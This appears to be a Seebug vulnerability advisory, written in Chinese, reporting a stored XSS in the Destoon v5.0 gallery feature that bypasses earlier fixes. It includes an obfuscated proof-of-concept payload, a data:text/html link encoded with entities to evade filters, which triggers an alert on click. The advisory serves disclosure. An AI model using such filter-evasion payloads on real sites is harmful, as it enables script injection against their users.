destoon /v5.0/ 存储型xss 指哪打哪(绕过3)

2014-06-11T00:00:00
ID SSV:94493
Type seebug
Reporter Root
Modified 2014-06-11T00:00:00

Description

简要描述:

destoon /v5.0/ 存储型xss 指哪打哪(绕过3)

详细说明:

关联url: WooYun: destoon /v5.0/ 存储型xss 指哪打哪(绕过2) 在发表图库时 未对发送的代码做出过滤

<img src="https://images.seebug.org/upload/201406/110947477e6758bb4df67b5dd8859aa829e34015.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

poc

&lt;a href=d&NewLine;&Tab;&#97;ta:text&sol;html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%2829%29%3C%2F%73%63%72%69%70%74%3E&gt;M

漏洞证明:

<img src="https://images.seebug.org/upload/201406/1109482775e1b2896a787b7c6b79c8b4f4257b96.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

点击就弹了,